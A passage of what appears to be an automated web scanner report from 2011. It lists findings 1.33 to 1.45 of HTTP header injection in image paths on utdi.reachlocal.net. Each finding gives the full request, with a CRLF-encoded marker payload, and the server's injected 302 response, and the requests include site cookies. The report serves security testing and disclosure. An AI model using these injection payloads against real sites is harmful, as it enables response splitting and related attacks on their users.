Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:40 GMT
Server: Apache
Location: http://utdi.com/ac19a
7030fac53e2/navbutton_about-ovr.jpg
Vary: Accept-Encoding
Content-Length: 311
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:32 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/ac19a
7030fac53e2/navbutton_ab
...[SNIP]...
|
1.33. http://utdi.reachlocal.net/images/navbutton_about.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/navbutton_about.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 564c7%0d%0ae0db7ba9b90 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /564c7%0d%0ae0db7ba9b90/navbutton_about.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:41 GMT
Server: Apache
Location: http://utdi.com/564c7
e0db7ba9b90/navbutton_about.jpg
Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:33 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/564c7
e0db7ba9b90/navbutton_ab
...[SNIP]...
|
1.34. http://utdi.reachlocal.net/images/navbutton_client-ovr.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/navbutton_client-ovr.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload d5ca8%0d%0abf51af5b896 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /d5ca8%0d%0abf51af5b896/navbutton_client-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:39 GMT
Server: Apache
Location: http://utdi.com/d5ca8
bf51af5b896/navbutton_client-ovr.jpg
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:32 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d5ca8
bf51af5b896/navbutton_cl
...[SNIP]...
|
1.35. http://utdi.reachlocal.net/images/navbutton_client.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/navbutton_client.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 37f02%0d%0ab42a12b1bbf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /37f02%0d%0ab42a12b1bbf/navbutton_client.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:45 GMT
Server: Apache
Location: http://utdi.com/37f02
b42a12b1bbf/navbutton_client.jpg
Vary: Accept-Encoding
Content-Length: 308
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:37 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/37f02
b42a12b1bbf/navbutton_cl
...[SNIP]...
|
1.36. http://utdi.reachlocal.net/images/navbutton_contact-ovr.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/navbutton_contact-ovr.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 7f0e7%0d%0a7c06fd67eb5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7f0e7%0d%0a7c06fd67eb5/navbutton_contact-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:34 GMT
Server: Apache
Location: http://utdi.com/7f0e7
7c06fd67eb5/navbutton_contact-ovr.jpg
Vary: Accept-Encoding
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:27 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/7f0e7
7c06fd67eb5/navbutton_co
...[SNIP]...
|
1.37. http://utdi.reachlocal.net/images/navbutton_contact.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/navbutton_contact.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload d419b%0d%0a6740deaef7b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /d419b%0d%0a6740deaef7b/navbutton_contact.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:42 GMT
Server: Apache
Location: http://utdi.com/d419b
6740deaef7b/navbutton_contact.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:35 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d419b
6740deaef7b/navbutton_co
...[SNIP]...
|
1.38. http://utdi.reachlocal.net/images/navbutton_products-ovr.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/navbutton_products-ovr.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 355c6%0d%0a88702d4c646 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /355c6%0d%0a88702d4c646/navbutton_products-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:39 GMT
Server: Apache
Location: http://utdi.com/355c6
88702d4c646/navbutton_products-ovr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:31 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/355c6
88702d4c646/navbutton_pr
...[SNIP]...
|
1.39. http://utdi.reachlocal.net/images/navbutton_products.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/navbutton_products.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 789fe%0d%0a5615b38ed3b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /789fe%0d%0a5615b38ed3b/navbutton_products.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
Location: http://utdi.com/789fe
5615b38ed3b/navbutton_products.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:39 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/789fe
5615b38ed3b/navbutton_pr
...[SNIP]...
|
1.40. http://utdi.reachlocal.net/images/navbutton_projects-ovr.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/navbutton_projects-ovr.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 6907f%0d%0a53622b16624 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6907f%0d%0a53622b16624/navbutton_projects-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:38 GMT
Server: Apache
Location: http://utdi.com/6907f
53622b16624/navbutton_projects-ovr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:30 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/6907f
53622b16624/navbutton_pr
...[SNIP]...
|
1.41. http://utdi.reachlocal.net/images/navbutton_projects.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/navbutton_projects.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload ad123%0d%0aeb18754afb7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /ad123%0d%0aeb18754afb7/navbutton_projects.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:43 GMT
Server: Apache
Location: http://utdi.com/ad123
eb18754afb7/navbutton_projects.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:35 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/ad123
eb18754afb7/navbutton_pr
...[SNIP]...
|
1.42. http://utdi.reachlocal.net/images/navbutton_services-ovr.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/navbutton_services-ovr.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 4acb8%0d%0ab541b30dd04 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4acb8%0d%0ab541b30dd04/navbutton_services-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:37 GMT
Server: Apache
Location: http://utdi.com/4acb8
b541b30dd04/navbutton_services-ovr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:30 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/4acb8
b541b30dd04/navbutton_se
...[SNIP]...
|
1.43. http://utdi.reachlocal.net/images/navbutton_services.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/navbutton_services.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 35525%0d%0a72310b3416a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /35525%0d%0a72310b3416a/navbutton_services.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
Location: http://utdi.com/35525
72310b3416a/navbutton_services.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:39 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/35525
72310b3416a/navbutton_se
...[SNIP]...
|
1.44. http://utdi.reachlocal.net/images/partner-logos-avaya.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/partner-logos-avaya.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 3b074%0d%0ae845103065b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3b074%0d%0ae845103065b/partner-logos-avaya.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:28 GMT
Server: Apache
Location: http://utdi.com/3b074
e845103065b/partner-logos-avaya.jpg
Vary: Accept-Encoding
Content-Length: 311
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:21 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/3b074
e845103065b/partner-logo
...[SNIP]...
|
1.45. http://utdi.reachlocal.net/images/partner-logos-sonexis.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/partner-logos-sonexis.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload d9d65%0d%0a27fb644bc97 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /d9d65%0d%0a27fb644bc97/partner-logos-sonexis.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:17 GMT
Server: Apache
Location: http://utdi.com/d9d65
27fb644bc97/partner-logos-sonexis.jpg
Vary: Accept-Encoding
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:10 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d9d65
27fb644bc97/partner-logo
...[SNIP]...
|
